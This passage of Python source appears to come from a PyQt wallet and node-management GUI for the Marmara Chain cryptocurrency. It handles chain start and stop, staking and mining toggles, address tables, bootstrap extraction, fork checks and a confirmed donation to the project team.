self.bottom_info(self.tr('getting wallet addresses'))\n logging.info('getting wallet addresses')\n elif result.get('WalletActivatedAddresses') or result.get('WalletActivatedAddresses') == []:\n TotalAmountOnActivated = 0.0\n for activated in result.get('WalletActivatedAddresses'):\n TotalAmountOnActivated = TotalAmountOnActivated + activated.get('amount')\n self.totalactivated_value_label.setText(str(TotalAmountOnActivated))\n self.wallet_total_activated_value.setText(str(TotalAmountOnActivated))\n else:\n self.setgenerate_result(result_out)\n self.bottom_info(self.tr('Chain init completed.'))\n logging.info('Chain init completed.')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def enable_start_button(self):\n self.startchain_button.setVisible(True)\n self.stopchain_button.setVisible(False)\n\n def disable_start_button(self):\n self.startchain_button.setVisible(False)\n self.stopchain_button.setVisible(True)\n\n def check_chain_update(self):\n self.update_chain_button.setHidden(True)\n self.worker_api_chain_update = marmarachain_rpc.ApiWorker()\n self.worker_api_chain_update.moveToThread(self.thread_api_chain_update_check)\n self.worker_api_chain_update.finished.connect(self.thread_api_chain_update_check.quit)\n self.thread_api_chain_update_check.started.connect(self.worker_api_chain_update.mcl_update_check)\n self.thread_api_chain_update_check.start()\n self.worker_api_chain_update.out_str.connect(self.check_installed_mcl_version)\n self.worker_api_chain_update.out_err.connect(self.check_chain_update_err)\n\n @pyqtSlot(str)\n 
def check_installed_mcl_version(self, out):\n self.latest_chain_version = out\n if marmarachain_rpc.marmara_path:\n installed_chain_versiyon = self.get_installed_chain_version()\n if out == installed_chain_versiyon:\n self.update_chain_button.setHidden(True)\n else:\n self.update_chain_button.setHidden(False)\n else:\n self.update_chain_button.setHidden(False)\n\n def get_installed_chain_version(self):\n if marmarachain_rpc.is_local:\n file = None\n try:\n file = open(marmarachain_rpc.marmara_path + 'version.info', \"r\")\n self.chain_versiyon_tag = file.read().rstrip()\n self.chain_version_label.setText('Marmara Chain ' + self.chain_versiyon_tag)\n return self.chain_versiyon_tag\n except IOError as error:\n logging.error(\"Exception error while reading mcl version info file: \" + str(error))\n self.update_chain_button.setHidden(False)\n finally:\n if file:\n file.close()\n else:\n remote_file = None\n try:\n sftp_client = marmarachain_rpc.ssh_client.open_sftp()\n remote_file = sftp_client.open(marmarachain_rpc.marmara_path + 'version.info', \"r\")\n self.chain_versiyon_tag = remote_file.read().rstrip().decode()\n self.chain_version_label.setText('Marmara Chain ' + self.chain_versiyon_tag)\n return self.chain_versiyon_tag\n except Exception as error:\n logging.error(\"Exception error while reading mcl version info file: \" + str(error))\n self.update_chain_button.setHidden(False)\n finally:\n if remote_file:\n remote_file.close()\n\n @pyqtSlot(str)\n def check_chain_update_err(self, err):\n self.bottom_info(err)\n self.update_chain_button.setHidden(False)\n logging.error(err)\n\n # --------------------------------------\n # Stopping Chain\n # --------------------------------------\n @pyqtSlot()\n def stop_chain(self):\n if self.chain_status:\n self.start_animation()\n stop_chain_thread = self.stop_chain_thread()\n stop_chain_thread.finished.connect(self.stop_animation) # when finished close animation\n else:\n self.bottom_info(self.tr('Marmarachain is not started'))\n logging.warning('Marmarachain is not started')\n\n def stop_chain_thread(self):\n self.worker_stopchain = marmarachain_rpc.RpcHandler() # worker setting\n self.worker_stopchain.moveToThread(self.thread_stopchain) # putting in to thread\n self.worker_stopchain.finished.connect(self.thread_stopchain.quit) # when finished close thread\n self.thread_stopchain.started.connect(self.worker_stopchain.stopping_chain) # executing worker function\n self.thread_stopchain.start()\n self.worker_stopchain.command_out.connect(self.result_stopchain)\n return self.worker_stopchain\n\n @pyqtSlot(tuple)\n def result_stopchain(self, result_out):\n if result_out[2] != 1:\n if result_out[0]:\n print_result = \"\"\n for line in str(result_out[0]).splitlines():\n print_result = print_result + ' ' + str(line)\n logging.info(\"Stopping chain:\" + print_result)\n self.bottom_info(print_result)\n\n if result_out[0] == 0:\n self.bottom_info(self.tr('Marmarachain stopped'))\n logging.info('Marmarachain stopped')\n self.chain_status = False\n self.myCCActivatedAddress = None\n self.chainstatus_label_value.setPixmap(self.inactive_icon_pixmap)\n self.update_addresses_table()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # -------------------------------------------------------\n # Getting getinfo command\n # -------------------------------------------------------\n @pyqtSlot()\n def get_getinfo(self):\n self.worker_getinfo = marmarachain_rpc.RpcHandler() # worker setting\n method = cp.getinfo # setting command\n params = []\n 
self.worker_thread(self.thread_getinfo, self.worker_getinfo, method, params, self.getinfo_result)\n\n @pyqtSlot(tuple)\n def getinfo_result(self, result_out):\n if result_out[0]:\n getinfo_result = result_out[0]\n getinfo_result = json.loads(getinfo_result)\n self.bottom_info(self.tr('loading getinfo values'))\n logging.info('Loading getinfo values')\n self.set_getinfo_result(getinfo_result)\n logging.info('getinfo finished')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def set_getinfo_result(self, getinfo_result):\n if getinfo_result.get('synced'):\n self.chainsync_label_value.setPixmap(self.active_icon_pixmap)\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignCenter)\n self.chain_synced = True\n if not getinfo_result.get('synced'):\n self.chain_synced = False\n if int(getinfo_result['longestchain']) == 0:\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignCenter)\n self.chainsync_label_value.setPixmap(self.inactive_icon_pixmap)\n else:\n block_diff = int(getinfo_result['longestchain']) - int(getinfo_result['blocks'])\n days_sync = None\n if 0 < block_diff < 61:\n days_sync = str(block_diff) + self.tr(' Min')\n if 60 < block_diff < 1140:\n days_sync = str(round(block_diff / 60)) + self.tr(' Hour')\n if block_diff > 1140:\n days_sync = str(round(block_diff / 1440)) + self.tr(' Day')\n if block_diff == 0:\n days_sync = None\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignCenter)\n self.chainsync_label_value.setPixmap(self.inactive_icon_pixmap)\n if block_diff:\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignLeft)\n self.chainsync_label_value.setText(days_sync)\n if getinfo_result.get('pubkey'):\n self.pubkey_status = True\n self.current_pubkey_value.setText(str(getinfo_result['pubkey']))\n if getinfo_result.get('pubkey') is None or getinfo_result.get('pubkey') is \"\":\n self.bottom_info(self.tr('pubkey is not set'))\n logging.warning('pubkey is not set')\n self.pubkey_status = False\n self.current_pubkey_value.setText(\"\")\n if getinfo_result.get('errors') is \"\":\n self.update_chain_textBrowser.setVisible(False)\n if getinfo_result.get('errors') is not \"\":\n self.update_chain_textBrowser.setVisible(True)\n self.update_chain_textBrowser.setText(str(getinfo_result.get('errors')))\n self.difficulty_value_label.setText(str(int(getinfo_result['difficulty'])))\n self.currentblock_value_label.setText(str(getinfo_result['blocks']))\n self.longestchain_value_label.setText(str(getinfo_result['longestchain']))\n connection_count = int(getinfo_result['connections'])\n if connection_count == 0:\n self.connections_warning_label.setVisible(True)\n if connection_count > 0:\n self.connections_warning_label.setVisible(False)\n self.connections_value_label.setText(str(getinfo_result['connections']))\n self.totalnormal_value_label.setText(str(getinfo_result['balance']))\n self.wallet_total_normal_value.setText(str(getinfo_result['balance']))\n self.bottom_info(self.tr('getinfo finished'))\n logging.info('getinfo finished')\n\n # -----------------------------------------------------------\n # Side panel functions\n # -----------------------------------------------------------\n @pyqtSlot()\n def refresh_side_panel(self):\n self.bottom_info(self.tr('getting getinfo'))\n logging.info('getting getinfo')\n # self.get_getinfo()\n self.worker_sidepanel = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_sidepanel, self.worker_sidepanel, worker_output=self.refresh_side_panel_result,\n execute='refresh_sidepanel')\n last_update = self.tr('Last Update: 
')\n # date = (str(datetime.now().date()))\n last_update_time = str(datetime.now().time().replace(microsecond=0))\n self.last_update_label.setText(last_update + last_update_time)\n self.update_datetime_edit_maxdates()\n\n @pyqtSlot(tuple)\n def refresh_side_panel_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n if result.get('version'):\n self.set_getinfo_result(result)\n self.bottom_info(self.tr('getting activated balance.'))\n logging.info('getting activated balance.')\n else:\n TotalAmountOnActivated = 0.0\n for activated in json.loads(result_out[0]).get('WalletActivatedAddresses'):\n TotalAmountOnActivated = TotalAmountOnActivated + activated.get('amount')\n self.totalactivated_value_label.setText(str(TotalAmountOnActivated))\n self.wallet_total_activated_value.setText(str(TotalAmountOnActivated))\n self.bottom_info(self.tr('Refresh completed.'))\n logging.info('Refresh completed.')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def update_datetime_edit_maxdates(self):\n self.transactions_startdate_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_stop_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_start_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_stop_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.transactions_endtdate_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.make_credit_loop_matures_dateTimeEdit.setMinimumDateTime(QDateTime.currentDateTime())\n\n @pyqtSlot()\n def copyaddress_clipboard(self):\n address = self.currentaddress_value.text()\n if address != \"\":\n QtWidgets.QApplication.clipboard().setText(address)\n self.bottom_info(self.tr('copied ') + address)\n logging.info('copied ' + address)\n else:\n self.bottom_info(self.tr('no address value set'))\n logging.warning('no address value set')\n\n @pyqtSlot()\n def decrease_fontsize(self):\n if self.default_fontsize >= 9:\n self.default_fontsize = self.default_fontsize - 1\n self.set_font_size(self.default_fontsize)\n self.bottom_info('fontsize :' + str(self.default_fontsize))\n\n @pyqtSlot()\n def increase_fontsize(self):\n if self.default_fontsize <= 20:\n self.default_fontsize = self.default_fontsize + 1\n self.set_font_size(self.default_fontsize)\n self.bottom_info('fontsize :' + str(self.default_fontsize))\n\n @pyqtSlot()\n def copypubkey_clipboard(self):\n pubkey = self.current_pubkey_value.text()\n if pubkey != \"\":\n QtWidgets.QApplication.clipboard().setText(pubkey)\n self.bottom_info(self.tr('copied ') + pubkey)\n logging.info('copied ' + pubkey)\n else:\n self.bottom_info(self.tr('no pubkey value set'))\n logging.warning('no pubkey value set')\n\n @pyqtSlot()\n def open_discord(self):\n webbrowser.open_new('https://marmara.io/discord')\n\n @pyqtSlot()\n def open_youtube(self):\n webbrowser.open_new('https://www.youtube.com/c/MarmaraCreditLoops')\n\n @pyqtSlot()\n def open_website(self):\n webbrowser.open_new('https://marmara.io')\n\n @pyqtSlot()\n def toggle_staking(self):\n if self.staking_button.isChecked(): # Staking button status is True.\n if self.mining_button.isChecked(): # Checking mining is also active\n message_box = self.custom_message(self.tr('Turning off Mining'),\n self.tr('Mining is currently on. '\n 'You are about to turn off mining. 
Are you sure?'),\n \"question\",\n QMessageBox.Question)\n\n if message_box == QMessageBox.Yes:\n self.mining_button.setChecked(False) # Close mining and set staking mode\n self.cpu_core_selection_off()\n logging.info('setgenerate True 0')\n self.setgenerate([True, 0])\n if message_box == QMessageBox.No: # Abort selecting staking and continue mining\n self.staking_button.setChecked(False)\n else: # set staking mode\n logging.info('setgenerate True 0')\n self.setgenerate([True, 0])\n else: # Staking button status is False\n message_box = self.custom_message(self.tr('Turning off Staking'),\n self.tr('You are about to turn off staking. Are you sure?'), \"question\",\n QMessageBox.Question)\n\n if message_box == QMessageBox.Yes:\n logging.info('setgenerate False')\n self.setgenerate([False])\n if message_box == QMessageBox.No:\n self.staking_button.setChecked(True) # Abort selecting staking button\n\n @pyqtSlot()\n def toggle_mining(self):\n if self.mining_button.isChecked(): # Mining button status is True.\n if self.staking_button.isChecked(): # Checking staking is also active\n message_box = self.custom_message(self.tr('Turning off Staking'),\n self.tr('Staking is currently active. '\n 'You are about to turn off staking. Are you sure?'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.staking_button.setChecked(False) # Close staking and turn on mining\n logging.info('setgenerate True 1')\n self.setgenerate([True, 1])\n self.cpu_core_selection_on()\n if message_box == QMessageBox.No: # Abort selecting mining and continue staking\n self.mining_button.setChecked(False)\n else: # Staking is off turn on Mining mode\n logging.info('setgenerate True 1')\n self.cpu_core_selection_on()\n self.setgenerate([True, 1])\n else: # Mining button status is False.\n message_box = self.custom_message(self.tr('Turning off Mining'),\n self.tr('You are about to turn off mining. 
Are you sure?'), \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n logging.info('setgenerate False')\n self.cpu_core_selection_off()\n self.setgenerate([False])\n if message_box == QMessageBox.No:\n self.mining_button.setChecked(True) # Abort selecting mining button\n\n def cpu_core_selection_on(self):\n self.cpu_label.setVisible(True)\n self.cpu_core_lineEdit.setVisible(True)\n self.cpu_core_set_button.setVisible(True)\n\n def cpu_core_selection_off(self):\n self.cpu_label.setVisible(False)\n self.cpu_core_lineEdit.setVisible(False)\n self.cpu_core_set_button.setVisible(False)\n\n def setgenerate(self, arg):\n self.worker_setgenerate = marmarachain_rpc.RpcHandler()\n method = cp.setgenerate\n params = arg\n self.worker_thread(self.thread_setgenerate, self.worker_setgenerate, method, params, self.setgenerate_result,\n execute='setgenerate')\n\n @pyqtSlot(tuple)\n def setgenerate_result(self, result_out):\n if result_out[0]:\n logging.info('\\n---- getgenerate result------\\n' + str(json.loads(result_out[0])))\n result = json.loads(result_out[0])\n if result.get('staking') is True and result.get('generate') is False:\n self.bottom_info(self.tr('Staking ON'))\n logging.info('Staking ON')\n self.staking_button.setChecked(True)\n self.mining_button.setChecked(False)\n if result.get('staking') is False and result.get('generate') is False:\n self.bottom_info(self.tr('Mining status is OFF'))\n logging.info('Mining status is OFF')\n self.staking_button.setChecked(False)\n self.mining_button.setChecked(False)\n if result.get('generate') is True and result.get('staking') is False:\n self.bottom_info(self.tr('Mining ON with ') + str(result.get('numthreads')))\n logging.info('Mining ON with ' + str(result.get('numthreads')))\n self.cpu_core_lineEdit.setText(str(result.get('numthreads')))\n self.cpu_core_selection_on()\n self.staking_button.setChecked(False)\n self.mining_button.setChecked(True)\n if result_out[1]:\n self.bottom_err_info(self.tr(result_out[1]))\n\n @pyqtSlot()\n def setmining_cpu_core(self):\n cpu_no = self.cpu_core_lineEdit.text()\n self.setgenerate([True, int(cpu_no)])\n\n @pyqtSlot()\n def toggle_walletsummary(self):\n if self.walletsummary_amount_frame.isHidden():\n self.walletsummary_hide_button.setIcon(qta.icon('ei.eye-close', color='#cc2900'))\n self.walletsummary_hide_button.setToolTip(self.tr('Hide'))\n self.walletsummary_amount_frame.setHidden(False)\n configuration.ApplicationConfig().set_key_value('USER', 'balance_hide', 'False')\n else:\n self.walletsummary_hide_button.setIcon(qta.icon('ei.eye-open', color='#cc2900'))\n self.walletsummary_hide_button.setToolTip(self.tr('Show'))\n self.walletsummary_amount_frame.setHidden(True)\n configuration.ApplicationConfig().set_key_value('USER', 'balance_hide', 'True')\n\n @pyqtSlot()\n def calculate_amount(self):\n number_of_cups = self.cup_lineEdit.text()\n if number_of_cups == \"\" or int(number_of_cups) == 0:\n self.support_pushButton.setEnabled(False)\n self.support_pushButton.setText(self.tr('Support'))\n else:\n amount = int(number_of_cups) * 30\n self.support_pushButton.setEnabled(True)\n self.support_pushButton.setText(self.tr('Support') + ' (' + str(amount) + ' MCL)')\n\n @pyqtSlot()\n def send_coins_to_team(self):\n number_of_cups = self.cup_lineEdit.text()\n amount = int(number_of_cups) * 30\n team_address = 'RXWqisAoJKEGVyXj46Zo3fDZnZTwQA6kQE'\n self.support_pushButton.setText(self.tr('Support') + ' (' + str(amount) + ' MCL)')\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n 
self.tr('The amount to be sent to the Marmara Team is ') + str(amount)\n + ' MCL',\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.worker_sendtoteam = marmarachain_rpc.RpcHandler()\n method = cp.sendtoaddress\n params = [team_address, str(amount)]\n self.worker_thread(self.thread_sendtoteam, self.worker_sendtoteam, method, params,\n self.sendtoaddress_result)\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n\n # -----------------------------------------------------------\n # Chain page functions\n # -----------------------------------------------------------\n\n # getting addresses for address table widget\n @pyqtSlot()\n def getaddresses(self):\n if self.chain_status:\n self.bottom_info(self.tr('getting wallet addresses'))\n logging.info('getting wallet addresses')\n self.worker_getaddresses = marmarachain_rpc.RpcHandler()\n self.worker_thread(thread=self.thread_getaddresses, worker=self.worker_getaddresses,\n worker_output=self.set_getaddresses_result, execute='get_addresses')\n else:\n self.update_addresses_table()\n\n @pyqtSlot(list)\n def set_getaddresses_result(self, result_out):\n if not result_out:\n self.bottom_err_info(self.tr('could not get addresses. make sure chain is running'))\n else:\n self.bottom_info(self.tr('Loading Addresses ...'))\n logging.info('Loading Addresses ...')\n self.addresses_tableWidget.setSortingEnabled(False)\n self.addresses_tableWidget.setRowCount(len(result_out))\n logging.info('\\n------wallet address list----- \\n' + str(result_out))\n for row_number, row in enumerate(result_out):\n if self.pubkey_status:\n self.addresses_tableWidget.setColumnHidden(0, True)\n btn_setpubkey = QPushButton('Set pubkey')\n self.addresses_tableWidget.setCellWidget(row_number, 0, btn_setpubkey)\n self.addresses_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n for column_number, item in enumerate(row):\n self.addresses_tableWidget.setItem(row_number, (column_number + 1), QTableWidgetItem(str(item)))\n self.addresses_tableWidget.horizontalHeader().setSectionResizeMode((column_number + 1),\n QHeaderView.ResizeToContents)\n btn_setpubkey.clicked.connect(self.set_pubkey)\n self.bottom_info(self.tr('Loading Addresses finished'))\n logging.info('Loading Addresses finished')\n self.addresses_tableWidget.setSortingEnabled(True)\n # self.hide_address_checkBox.setCheckState(False)\n self.update_addresses_table()\n\n @pyqtSlot()\n def hide_addresses(self):\n self.unhide_addresses()\n if self.hide_address_checkBox.checkState():\n rowcount = self.addresses_tableWidget.rowCount()\n while rowcount > 0:\n rowcount = rowcount - 1\n if self.addresses_tableWidget.item(rowcount, 1).text() == \"0.0\":\n self.addresses_tableWidget.setRowHidden(rowcount, True)\n\n def unhide_addresses(self):\n rowcount = self.addresses_tableWidget.rowCount()\n while rowcount > 0:\n rowcount = rowcount - 1\n self.addresses_tableWidget.setRowHidden(rowcount, False)\n\n @pyqtSlot(int, int)\n def addresstable_itemcontext(self, row, column):\n item = self.addresses_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n def update_addresses_table(self):\n if self.addresses_tableWidget.rowCount() > 0:\n if self.pubkey_status:\n self.addresses_tableWidget.setColumnHidden(0, True)\n if self.current_pubkey_value.text() == \"\":\n self.get_getinfo()\n 
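# Table columns as filled by set_getaddresses_result and get_known_addresses: 0 = action button, 1 = amount, 2 = address, 3 = pubkey, 4 = contact name\n 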
current_pubkey = self.current_pubkey_value.text()\n rowcount = self.addresses_tableWidget.rowCount()\n while True:\n rowcount = rowcount - 1\n if current_pubkey == self.addresses_tableWidget.item(rowcount, 3).text():\n self.currentaddress_value.setText(self.addresses_tableWidget.item(rowcount, 2).text())\n if rowcount == 0:\n break\n if not self.chain_status:\n self.addresses_tableWidget.setColumnHidden(0, False)\n rowcount = self.addresses_tableWidget.rowCount()\n self.addresses_tableWidget.setRowCount(rowcount)\n while True:\n btn_start = QPushButton('Start')\n btn_start.setIcon(QIcon(self.icon_path + \"/start_icon.png\"))\n rowcount = rowcount - 1\n self.addresses_tableWidget.setCellWidget(rowcount, 0, btn_start)\n btn_start.clicked.connect(self.start_chain_with_pubkey)\n if rowcount == 0:\n break\n self.hide_addresses()\n self.get_known_addresses()\n\n def check_address_contact_name(self, address):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n known_address = \"\"\n for contact in contacts_data: # each contact set in contacts_data\n if contact[1] == address: # contact[1] contact address\n known_address = contact[0] # contact[0] contact name\n break\n return known_address\n\n def get_known_addresses(self):\n rowcount = self.addresses_tableWidget.rowCount()\n self.addresses_tableWidget.setRowCount(rowcount)\n while True:\n rowcount = rowcount - 1\n address = self.addresses_tableWidget.item(rowcount, 2).text()\n known_address = self.check_address_contact_name(address)\n self.addresses_tableWidget.setItem(rowcount, 4, QTableWidgetItem(str(known_address)))\n self.addresses_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n if rowcount == 0:\n break\n\n @pyqtSlot()\n def set_pubkey(self):\n button = self.sender()\n index = self.addresses_tableWidget.indexAt(button.pos())\n if index.isValid():\n self.worker_setpubkey = marmarachain_rpc.RpcHandler()\n method = cp.setpubkey\n params = [self.addresses_tableWidget.item(index.row(), 3).text()]\n self.worker_thread(self.thread_setpubkey, self.worker_setpubkey, method, params, self.set_pubkey_result)\n\n @pyqtSlot(tuple)\n def set_pubkey_result(self, result_out):\n if result_out[0]:\n self.get_getinfo()\n if str(json.loads(result_out[0])).rfind('error') > -1:\n pubkey = json.loads(result_out[0])['pubkey']\n logging.info('this pubkey: ' + pubkey + ' is already set')\n self.bottom_info(result_out[0])\n logging.info(result_out[0])\n\n message_box = self.custom_message(self.tr('Pubkey set'), str(json.loads(result_out[0])['pubkey']),\n \"information\",\n QMessageBox.Information)\n if message_box == QMessageBox.Ok:\n self.update_addresses_table()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def start_chain_with_pubkey(self):\n button = self.sender()\n index = self.addresses_tableWidget.indexAt(button.pos())\n logging.info(index.row())\n logging.info(index.column())\n if index.isValid():\n pubkey = self.addresses_tableWidget.item(index.row(), 3).text()\n self.start_chain_settings(pubkey)\n\n def start_chain_settings(self, pubkey=None):\n if pubkey:\n self.bottom_info(self.tr('Chain started with pubkey'))\n logging.info('Chain started with pubkey')\n reindex_param = ''\n rescan_param = ''\n if self.reindex_checkBox.checkState():\n reindex_param = ' -reindex'\n if self.rescan_checkBox.checkState():\n rescan_param = ' -rescan'\n start_param = pubkey + reindex_param + rescan_param\n logging.info(start_param)\n marmarachain_rpc.start_chain(start_param)\n 
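# short pause so the freshly launched daemon can come up before the readiness check below (intent inferred from the surrounding code)\n 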
time.sleep(0.5)\n self.addresses_tableWidget.setColumnHidden(0, True)\n self.is_chain_ready()\n else:\n logging.info('sending chain start command')\n self.bottom_info(self.tr('sending chain start command'))\n marmarachain_rpc.start_chain()\n self.disable_start_button()\n self.is_chain_ready()\n # self.is_chain_ready()\n # self.start_pubkey = pubkey\n # font = QFont()\n # font.setPointSize(self.default_fontsize)\n # startchainDialog = QDialog(self)\n # startchainDialog.setWindowTitle(self.tr('Settings for Chain Start'))\n # startchainDialog.layout = QVBoxLayout()\n # startchainDialog.setFont(font)\n # apply_button = QPushButton('Start')\n # apply_button.setIcon(QIcon(self.icon_path + \"/start_icon.png\"))\n # apply_button.setFont(font)\n # button_layout = QHBoxLayout()\n # self.reindex = QtWidgets.QCheckBox('reindex' + self.tr(' (starts from beginning and re-indexes currently '\n # 'synced blockchain data)'))\n # self.reindex.setChecked(False)\n # self.rescan = QtWidgets.QCheckBox('rescan' + self.tr(' (starts scanning wallet data in blockchain data)'))\n # self.rescan.setChecked(False)\n # self.reindex.setFont(font)\n # self.rescan.setFont(font)\n # spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n # startchainDialog.setLayout(startchainDialog.layout)\n # startchainDialog.layout.addWidget(self.reindex)\n # startchainDialog.layout.addWidget(self.rescan)\n # startchainDialog.layout.addLayout(button_layout)\n # button_layout.addItem(spacer_item)\n # button_layout.addWidget(apply_button)\n #\n # apply_button.clicked.connect(self.start_chain_with_settings)\n # apply_button.clicked.connect(startchainDialog.close)\n # startchainDialog.exec_()\n\n # @pyqtSlot()\n # def start_chain_with_settings(self):\n # reindex_param = ''\n # rescan_param = ''\n # if self.reindex.checkState():\n # reindex_param = ' -reindex'\n # if self.rescan.checkState():\n # rescan_param = ' -rescan'\n # start_param = self.start_pubkey + reindex_param + rescan_param\n # logging.info(start_param)\n # marmarachain_rpc.start_chain(start_param)\n # time.sleep(0.5)\n # self.addresses_tableWidget.setColumnHidden(0, True)\n # self.is_chain_ready()\n\n @pyqtSlot()\n def download_blocks(self):\n font = QFont()\n font.setPointSize(self.default_fontsize)\n blocksDialog = QDialog(self)\n blocksDialog.setWindowTitle(self.tr('Download Blocks bootstrap'))\n blocksDialog.layout = QGridLayout()\n blocksDialog.setFont(font)\n description_label = QtWidgets.QLabel()\n spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n browse_button = QtWidgets.QPushButton(self.tr('Browse ../ Extract'))\n browse_button.setFont(font)\n download_button = QtWidgets.QPushButton('Download')\n download_button.setFont(font)\n description_label.setText(\n self.tr('You can either download or browse and extract previously downloaded bootstrap.'))\n description_label.setFont(font)\n\n blocksDialog.setLayout(blocksDialog.layout)\n blocksDialog.layout.addWidget(description_label, 0, 0, 1, 3)\n blocksDialog.layout.addItem(spacer_item, 1, 0, 1, 1)\n blocksDialog.layout.addWidget(download_button, 1, 1, 1, 1)\n blocksDialog.layout.addWidget(browse_button, 1, 2, 1, 1)\n\n # if self.download_button.clicked():\n download_button.clicked.connect(self.download_bootstrap_via_webbrowser)\n download_button.clicked.connect(blocksDialog.close)\n browse_button.clicked.connect(self.browse_bootstrap)\n browse_button.clicked.connect(blocksDialog.close)\n blocksDialog.exec_()\n\n 
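# A minimal sketch of the per-platform MCL data directory lookup that browse_bootstrap below spells out inline; the helper name is illustrative only and nothing in the original code calls it.\n def _mcl_data_dir(self):\n if platform.system() == 'Darwin':\n return os.environ['HOME'] + '/Library/Application Support/Komodo/MCL'\n if platform.system() == 'Linux':\n return os.environ['HOME'] + '/.komodo/MCL'\n return os.path.join(os.environ['APPDATA'], 'Komodo', 'MCL') # Windows / Win64\n\n 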
@pyqtSlot()\n def download_bootstrap_via_webbrowser(self):\n if marmarachain_rpc.is_local:\n webbrowser.open_new('https://eu.bootstrap.dexstats.info/MCL-bootstrap.tar.gz')\n else:\n pass\n\n @pyqtSlot()\n def browse_bootstrap(self):\n home_path = str(pathlib.Path.home())\n get_bootstrap_path = QFileDialog.getOpenFileName(self, caption=self.tr('select bootstrap.tar.gz'),\n directory=home_path, filter='*.tar.gz')\n bootstrap_path = str(get_bootstrap_path).split(',')[0].replace('(', '').replace(\"'\", '')\n if platform.system() == 'Darwin':\n destination_path = os.environ['HOME'] + '/Library/Application Support/Komodo/MCL'\n elif platform.system() == 'Linux':\n destination_path = os.environ['HOME'] + '/.komodo/MCL'\n elif platform.system() == 'Win64' or platform.system() == 'Windows':\n destination_path = '%s\\Komodo\\MCL' % os.environ['APPDATA']\n messagebox = self.custom_message(self.tr(\"Extracting blocks\"),\n self.tr(\"Marmara chain will be closed if it is running\"), 'question',\n QMessageBox.Question)\n\n if messagebox == QMessageBox.Yes:\n self.start_animation()\n stopchain_thread = None\n if self.chain_status:\n stopchain_thread = self.stop_chain_thread()\n self.worker_extract_bootstrap = marmarachain_rpc.RpcHandler() # worker setting\n self.worker_extract_bootstrap.set_command('tar -zvxf ' + bootstrap_path + ' -C ' + destination_path)\n self.worker_extract_bootstrap.set_method(destination_path)\n self.worker_extract_bootstrap.moveToThread(self.thread_extract_bootstrap) # putting in to thread\n self.worker_extract_bootstrap.finished.connect(self.thread_extract_bootstrap.quit)\n self.worker_extract_bootstrap.finished.connect(self.stop_animation) # when finished close animation\n self.thread_extract_bootstrap.started.connect(self.worker_extract_bootstrap.extract_bootstrap)\n self.update_chain_textBrowser.clear()\n self.update_chain_textBrowser.setVisible(True)\n if stopchain_thread is None:\n self.thread_extract_bootstrap.start()\n else:\n stopchain_thread.finished.connect(self.thread_extract_bootstrap.start)\n self.worker_extract_bootstrap.output.connect(self.extract_bootstrap_out)\n if messagebox == QMessageBox.No:\n self.bottom_info(self.tr('Bootstrap extracting cancelled'))\n\n @pyqtSlot(str)\n def extract_bootstrap_out(self, output):\n self.update_chain_textBrowser.append(output)\n logging.info(output)\n if output:\n self.update_chain_textBrowser.setVisible(True)\n if output == 'None':\n self.update_chain_textBrowser.setVisible(False)\n self.bottom_info(self.tr('Extracting blocks finished'))\n logging.info('Extracting blocks finished')\n\n # to do extract bootstrap on remote server\n\n @pyqtSlot()\n def check_fork(self):\n block = self.currentblock_value_label.text()\n self.worker_getblock = marmarachain_rpc.RpcHandler()\n method = cp.getblock\n params = [block]\n self.worker_thread(self.thread_getblock, self.worker_getblock, method, params, self.out_getblock,\n execute='check_fork_api')\n\n @pyqtSlot(tuple)\n def out_getblock(self, result_out):\n if result_out[2] == 0:\n if type(result_out[1]) is list:\n fork_message = \"\"\n forked = False\n self.fork_count = 0\n index = 1\n for r_list in result_out[1]:\n for item in result_out[0]:\n if item != r_list[result_out[0].index(item)]:\n forked = True\n self.fork_count = self.fork_count + 1\n if forked:\n fork_message = fork_message + self.tr('Not Sync with explorer') + str(index) \\\n + self.tr(\" possible fork \") + '\\n'\n forked = False\n else:\n fork_message = fork_message + self.tr('Sync with ') + 'explorer' + str(index) + ' 
